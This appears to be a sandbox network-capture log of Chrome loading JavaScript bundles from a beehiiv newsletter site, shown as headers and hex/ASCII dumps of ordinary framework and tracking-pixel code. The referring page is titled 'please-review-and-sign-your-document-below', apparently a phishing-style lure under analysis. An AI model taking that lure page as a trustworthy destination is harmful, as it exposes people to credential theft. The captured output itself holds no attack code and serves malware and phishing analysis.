                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"73b-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4166
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c1ed62c331-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 62 61 65 37 32 61 63 39 2d 39 35 65 35 2d 35 36 39 66 2d 62 37 33 36 2d 36 35 61 66 33 61 65 34 61 37 39 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="bae72ac9-95e5-569f-b736-65af3ae4a791")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 22 76 69 65 77 70 6f 72 74 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 2c 22 74 77 69 74 74 65 72 3a 75 72 6c 22 2c 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 2c 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 2c 22 66 62 3a 61 70 70 5f 69 64 22 5d 2c 41 3d 28 7b 63 61 6e 6f 6e 69 63 61 6c 55 72 6c 3a 67 2c 6d 61 74 63 68 65 73 3a 64 2c 6f 76 65 72 72 69 64 65 73 3a 6f 3d 7b 7d 2c 6c 69 6e 6b 73 3a 63 3d 5b 5d 2c 72 65 74 75 72 6e 45 61 72 6c 79 43 68 65 63 6b 3a 68 3d 21 31 2c 73 74 72 75 63 74 75 72 65 64 44 61 74 61 3a 70 7d 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 64 2e 66 69 6e 64 28 74 3d 3e 74 3f 2e 69 64 3d 3d 3d 22 72 6f 6f 74 22 29 2c 69 3d
                                                                                                                                            Data Ascii: "viewport","description","twitter:title","twitter:url","twitter:description","twitter:image","twitter:card","fb:app_id"],A=({canonicalUrl:g,matches:d,overrides:o={},links:c=[],returnEarlyCheck:h=!1,structuredData:p})=>{const n=d.find(t=>t?.id==="root"),i=
                                                                                                                                            2025-01-15 18:14:39 UTC25INData Raw: 35 2d 35 36 39 66 2d 62 37 33 36 2d 36 35 61 66 33 61 65 34 61 37 39 31 0a
                                                                                                                                            Data Ascii: 5-569f-b736-65af3ae4a791


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            138192.168.2.1649865104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC549OUTGET /assets/root-C5Mn_uH-.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 101490
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"18c72-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c2bb670f5d-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 34 35 32 34 33 61 35 66 2d 33 62 39 31 2d 35 31 32 31 2d 62 31 61 37 2d 61 61 32 37 39 31 65 32 39 64 38 64 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="45243a5f-3b91-5121-b1a7-aa2791e29d8d")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 63 20 61 73 20 54 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 78 32 64 61 5f 7a 63 76 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 67 20 61 73 20 5f 65 2c 61 4f 20 61 73 20 6c 74 2c 63 20 61 73 20 63 74 7d 66 72 6f 6d 22 2e 2f 41 70 70 47 6c 6f 62 61 6c 73 2d 32 42 72 2d 38 62 5a 73 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 43 20 61 73 20 62 65 2c 75 20 61 73 20 64 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 44 54 74 75 49 6a 7a 2d 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 4e 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 67 20 61 73 20 6d 74 2c 77 20 61 73 20 75 74 2c 5f 20 61 73 20 68 74 2c 75 20 61 73 20 49 2c 4d 20 61 73 20 78 74 2c 78 20 61 73 20 66 74 2c 53 20 61 73 20 70 74
                                                                                                                                            Data Ascii: c as T}from"./index-x2da_zcv.js";import{g as _e,aO as lt,c as ct}from"./AppGlobals-2Br-8bZs.js";import{C as be,u as dt}from"./index-DTtuIjz-.js";import{u as N}from"./useTranslation-CfKJAmGY.js";import{g as mt,w as ut,_ as ht,u as I,M as xt,x as ft,S as pt
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 54 65 7d 66 72 6f 6d 22 2e 2f 64 69 61 6c 6f 67 2d 43 74 70 48 76 76 66 44 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 50 20 61 73 20 4f 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 70 6e 46 78 4f 61 61 63 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 61 20 61 73 20 42 74 2c 4c 20 61 73 20 44 74 2c 50 20 61 73 20 7a 74 7d 66 72 6f 6d 22 2e 2f 50 61 67 65 50 72 6f 76 69 64 65 72 2d 75 4b 78 6f 69 4e 64 6c 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 4d 20 61 73 20 71 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 49 78 42 62 6e 66 2d 51 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 55 65 7d 66 72 6f 6d 22 2e 2f 75 73 65 49 73 4d 6f 62 69 6c 65 2d 6f 6e 45 75 75 4d 46 56 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 74 20 61 73 20 67 65 7d 66 72 6f 6d 22 2e 2f 69 31 38 6e 65 78 74 2d 42 56
                                                                                                                                            Data Ascii: Te}from"./dialog-CtpHvvfD.js";import{P as Ot}from"./index-pnFxOaac.js";import{a as Bt,L as Dt,P as zt}from"./PageProvider-uKxoiNdl.js";import{M as qt}from"./index-IxBbnf-Q.js";import{u as Ue}from"./useIsMobile-onEuuMFV.js";import{t as ge}from"./i18next-BV
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 2e 73 7d 29 7b 6c 65 74 7b 69 73 53 70 61 4d 6f 64 65 3a 61 7d 3d 6d 74 28 29 2c 6e 3d 71 28 29 2c 72 3d 73 74 28 29 3b 75 74 28 7b 67 65 74 4b 65 79 3a 74 2c 73 74 6f 72 61 67 65 4b 65 79 3a 46 65 7d 29 3b 6c 65 74 20 6f 3d 69 2e 75 73 65 4d 65 6d 6f 28 28 29 3d 3e 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 63 3d 74 28 6e 2c 72 29 3b 72 65 74 75 72 6e 20 63 21 3d 3d 6e 2e 6b 65 79 3f 63 3a 6e 75 6c 6c 7d 2c 5b 5d 29 3b 69 66 28 61 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 6c 3d 28 28 63 2c 64 29 3d 3e 7b 69 66 28 21 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 73 74 61 74 65 7c 7c 21 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 73 74 61 74 65 2e 6b 65 79 29 7b 6c 65 74 20 75 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2e
                                                                                                                                            Data Ascii: .s}){let{isSpaMode:a}=mt(),n=q(),r=st();ut({getKey:t,storageKey:Fe});let o=i.useMemo(()=>{if(!t)return null;let c=t(n,r);return c!==n.key?c:null},[]);if(a)return null;let l=((c,d)=>{if(!window.history.state||!window.history.state.key){let u=Math.random().
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 22 69 6e 20 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 2e 73 65 72 76 69 63 65 57 6f 72 6b 65 72 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6f 6e 74 72 6f 6c 6c 65 72 63 68 61 6e 67 65 22 2c 72 29 2c 6e 2e 63 75 72 72 65 6e 74 26 26 28 6e 2e 63 75 72 72 65 6e 74 3d 21 31 29 7d 7d 2c 5b 73 5d 29 7d 63 6f 6e 73 74 20 58 74 3d 28 7b 6d 61 6e 69 66 65 73 74 55 72 6c 3a 74 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 77 65 62 6d 61 6e 69 66 65 73 74 22 7d 29 3d 3e 61 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6c 69 6e 6b 22 2c 7b 72 65 6c 3a 22 6d 61 6e 69 66 65 73 74 22 2c 68 72 65 66 3a 74 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 51 74 28 74 2c 2e 2e 2e 73 29 7b 63 6f 6e 73 74 20 61 3d 6e 65 77 20 53 74 72 69 6e 67 28 53
                                                                                                                                            Data Ascii: "in navigator&&navigator.serviceWorker.removeEventListener("controllerchange",r),n.current&&(n.current=!1)}},[s])}const Xt=({manifestUrl:t="/manifest.webmanifest"})=>at.createElement("link",{rel:"manifest",href:t});function Qt(t,...s){const a=new String(S
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 61 2e 61 73 79 6e 63 3d 21 30 2c 61 2e 73 72 63 3d 60 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 24 7b 74 7d 60 2c 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 63 6f 6e 73 74 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6e 2e 61 73 79 6e 63 3d 21 30 2c 6e 2e 69 64 3d 22 67 61 2d 70 69 78 65 6c 22 2c 6e 2e 69 6e 6e 65 72 48 54 4d 4c 3d 60 0a 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61
                                                                                                                                            Data Ascii: ment("script");a.async=!0,a.src=`https://www.googletagmanager.com/gtag/js?id=${t}`,document.head.appendChild(a);const n=document.createElement("script");n.async=!0,n.id="ga-pixel",n.innerHTML=` (function(){try{ window.dataLayer = window.da
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 6a 2e 73 72 63 3d 0a 20
                                                                                                                                            Data Ascii: unction(){try{ (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 6e 63 61 74 28 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 30 29 29 29 7d 7d 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 74 74 71 2e 6d 65 74 68 6f 64 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 74 74 71 2e 73 65 74 41 6e 64 44 65 66 65 72 28 74 74 71 2c 74 74 71 2e 6d 65 74 68 6f 64 73 5b 69 5d 29 3b 74 74 71 2e 69 6e 73 74 61 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 74 71 2e 5f 69 5b 74 5d 7c 7c 5b 5d 2c 6e 3d 30 3b 6e 3c 74 74 71 2e 6d 65 74 68 6f 64 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 74 74 71 2e 73 65 74 41 6e 64 44 65 66 65 72 28 65 2c 74 74 71 2e 6d 65 74 68 6f 64 73 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 74 74 71 2e 6c 6f 61 64 3d 66 75
                                                                                                                                            Data Ascii: ncat(Array.prototype.slice.call(arguments,0)))}};for(var i=0;i<ttq.methods.length;i++)ttq.setAndDefer(ttq,ttq.methods[i]);ttq.instance=function(t){for(var e=ttq._i[t]||[],n=0;n<ttq.methods.length;n++)ttq.setAndDefer(e,ttq.methods[n]);return e},ttq.load=fu
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 74 27 29 3b 0a 20 20 20 20 20 20 20 20 2f 2f 20 49 6e 73 65 72 74 20 54 77 69 74 74 65 72 20 50 69 78 65 6c 20 49 44 20 61 6e 64 20 53 74 61 6e 64 61 72 64 20 45 76 65 6e 74 20 64 61 74 61 20 62 65 6c 6f 77 0a 20 20 20 20 20 20 20 20 74 77 71 28 27 69 6e 69 74 27 2c 27 24 7b 74 7d 27 29 3b 0a 20 20 20 20 20 20 7d 63 61 74 63 68 7b 2f 2a 73 77 61 6c 6c 6f 77 20 65 78 63 65 70 74 69 6f 6e 2a 2f 7d 7d 29 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 60 2c 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 7d 7d 63 61 74 63 68 7b 7d 7d 2c 5b 74 2c 73 5d 29 2c 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 58 28 29 7b 63 6f 6e 73 74 5b 74 2c 73 5d 3d 69 2e 75 73 65 53 74 61 74 65 28 22 62 72 6f 77 73 65 72 20 74 61 62 22 29 2c
                                                                                                                                            Data Ascii: t'); // Insert Twitter Pixel ID and Standard Event data below twq('init','${t}'); }catch{/*swallow exception*/}})(); `,document.head.appendChild(n)}}catch{}},[t,s]),null};function X(){const[t,s]=i.useState("browser tab"),
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 74 20 62 3d 21 4d 2c 52 3d 21 4d 3b 4d 26 26 28 62 3d 4d 26 26 43 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 43 29 3f 2e 6d 61 72 6b 65 74 69 6e 67 7c 7c 21 31 3a 21 28 4d 26 26 21 43 29 2c 52 3d 4d 26 26 43 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 43 29 3f 2e 64 61 74 61 50 72 6f 63 65 73 73 69 6e 67 7c 7c 21 31 3a 21 28 4d 26 26 21 43 29 29 3b 63 6f 6e 73 74 20 47 3d 61 3f 2e 66 61 63 65 62 6f 6f 6b 5f 70 69 78 65 6c 2c 48 3d 61 3f 2e 74 77 69 74 74 65 72 5f 70 69 78 65 6c 2c 57 3d 61 3f 2e 74 69 6b 74 6f 6b 5f 70 69 78 65 6c 2c 73 65 3d 61 3f 2e 67 6f 6f 67 6c 65 5f 61 6e 61 6c 79 74 69 63 73 5f 70 69 78 65 6c 2c 4f 3d 61 3f 2e 67 6f 6f 67 6c 65 5f 61 6e 61 6c 79 74 69 63 73 5f 34 5f 70 69 78 65 6c 2c 42 3d 61 3f 2e 67 74 6d 5f 70 69 78 65 6c 2c 66 65 3d 61 3f 2e
                                                                                                                                            Data Ascii: t b=!M,R=!M;M&&(b=M&&C?JSON.parse(C)?.marketing||!1:!(M&&!C),R=M&&C?JSON.parse(C)?.dataProcessing||!1:!(M&&!C));const G=a?.facebook_pixel,H=a?.twitter_pixel,W=a?.tiktok_pixel,se=a?.google_analytics_pixel,O=a?.google_analytics_4_pixel,B=a?.gtm_pixel,fe=a?.


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            139192.168.2.1649866104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC558OUTGET /assets/ArrowLeftIcon-Dz9QYxn0.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC896INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 856
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960861&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=hHLBEjQm0xlERnAPrG1PQ0dvpjfhy47dIXqgXlIETkk%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"358-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c30b9b1889-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC473INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 34 35 66 38 61 30 66 65 2d 35 66 30 38 2d 35 31 39 61 2d 62 64 31 31 2d 37 39 64 30 39 31 32 34 34 38 32 34 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="45f8a0fe-5f08-519a-bd11-79d091244824")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC383INData Raw: 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6e 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 74 7d 2c 6f 29 2c 72 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 74 7d 2c 72 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 2c 64 3a 22 4d 31 30 2e 35 20 31 39 2e 35 20 33 20 31 32 6d 30 20 30 20 37 2e 35 2d 37 2e 35 4d 33 20 31 32 68 31 38 22 7d 29 29 7d 63 6f 6e 73 74 20 69 3d 65 2e 66 6f 72
                                                                                                                                            Data Ascii: oke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M10.5 19.5 3 12m0 0 7.5-7.5M3 12h18"}))}const i=e.for


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            140192.168.2.1649867104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC840OUTGET /assets/_slug-BPtqEfI0.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
